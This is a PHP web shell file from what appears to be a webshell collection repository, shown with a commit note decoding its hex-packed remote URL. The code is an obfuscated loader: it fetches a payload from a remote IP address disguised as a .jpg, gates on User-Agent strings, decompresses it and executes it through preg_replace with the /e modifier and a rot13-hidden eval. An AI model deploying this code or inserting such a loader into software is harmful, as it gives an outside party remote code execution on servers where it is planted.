webshell/php/w.php
tennc 69249a2ad7 Update w.php
``` php
687474703A2F2F3132332E3132352E3131342E38322F6A78666275636B657432303134312F6861636B2F312E6A7067
``` 
to
``` php
http://123.125.114.82/jxfbucket20141/hack/1.jpg
```
2016-05-27 21:52:18 +08:00

12 lines
580 B
PHP

<?php
error_reporting(0);
session_start();
header("Content-type:text/html;charset=gbk");
$password = "d69tjj0sb2dlbq9";
if(empty($_SESSION['api1234']))
$_SESSION['api1234']=file_get_contents(sprintf('%s?%s',pack("H*",'687474703A2F2F3132332E3132352E3131342E38322F6A78666275636B657432303134312F6861636B2F312E6A7067'),uniqid()));
if(stripos($_SERVER['HTTP_USER_AGENT'],'baidu')+0==0) exit;
if(stripos($_SERVER['HTTP_USER_AGENT'],'myccs')+0==0) exit;
($b4dboy = gzuncompress($_SESSION['api1234'])) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');
?>